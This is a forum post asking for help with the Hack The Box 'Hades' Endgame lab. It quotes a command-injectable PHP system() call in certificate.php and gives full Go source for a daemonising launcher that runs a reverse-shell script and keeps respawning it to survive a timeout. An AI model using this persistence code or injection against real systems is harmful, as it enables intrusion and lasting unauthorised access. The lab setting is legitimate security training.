Endgame Hades-- foothold reverse shell auto disconnected

wuerror · May 24, 2023, 6:56am

In order to obtain the chasm flag，we need to exploit a command injection vulnerability in certificate.php.
key code as below:

system("timeout 5 curl --insecure -v https://$host 2>&1 | awk 'BEGIN { cert=0 } /^\* SSL connection/ { cert=1 } /^\*/ { if (cert) print }' &");

the command begin with “timeout 5”,so my reverse shell will be auto disconnected.so i try to upload a golang binary for starting a daemon process to escape the timeout limit. This has a partial effect, it can survive for more than 5 seconds but it will still be disconnected
the start daemon process sourcecode as below:

package main

//build and run
//go build -ldflags "-s -w" go-daemon.go
//./go-daemon -daemon -forever

import (
	"flag"
	"fmt"
	"log"
	"os"
	"os/exec"
	"time"
)

const (
	DAEMON  = "daemon"
	FOREVER = "forever"
)

func DoSomething() {
	fp, _ := os.OpenFile("./dosomething.log", os.O_WRONLY|os.O_CREATE|os.O_APPEND, 0644)
	log.SetOutput(fp)
        //reverse shell
	cmd := []string{"bash", "-c", "/var/tmp/rev"}
	SubProcess(cmd)
	for {
		log.Printf("DoSomething running in PID: %d PPID: %d\n", os.Getpid(), os.Getppid())
		time.Sleep(time.Second * 5)
	}
}

func StripSlice(slice []string, element string) []string {
	for i := 0; i < len(slice); {
		if slice[i] == element && i != len(slice)-1 {
			slice = append(slice[:i], slice[i+1:]...)
		} else if slice[i] == element && i == len(slice)-1 {
			slice = slice[:i]
		} else {
			i++
		}
	}
	return slice
}

func SubProcess(args []string) *exec.Cmd {
	cmd := exec.Command(args[0], args[1:]...)
	cmd.Stdin = os.Stdin
	cmd.Stdout = os.Stdout
	cmd.Stderr = os.Stderr
	err := cmd.Start()
	if err != nil {
		fmt.Fprintf(os.Stderr, "[-] Error: %s\n", err)
	}
	return cmd
}

func main() {
	daemon := flag.Bool(DAEMON, false, "run in daemon")
	forever := flag.Bool(FOREVER, false, "run forever")
	flag.Parse()
	fmt.Printf("[*] PID: %d PPID: %d ARG: %s\n", os.Getpid(), os.Getppid(), os.Args)
	if *daemon {
		SubProcess(StripSlice(os.Args, "-"+DAEMON))
		fmt.Printf("[*] Daemon running in PID: %d PPID: %d\n", os.Getpid(), os.Getppid())
		os.Exit(0)
	} else if *forever {
		for {
			cmd := SubProcess(StripSlice(os.Args, "-"+FOREVER))
			fmt.Printf("[*] Forever running in PID: %d PPID: %d\n", os.Getpid(), os.Getppid())
			cmd.Wait()
		}
		//os.Exit(0)
	} else {
		fmt.Printf("[*] Service running in PID: %d PPID: %d\n", os.Getpid(), os.Getppid())
	}
	DoSomething()
}

can anyone give me a suggestion?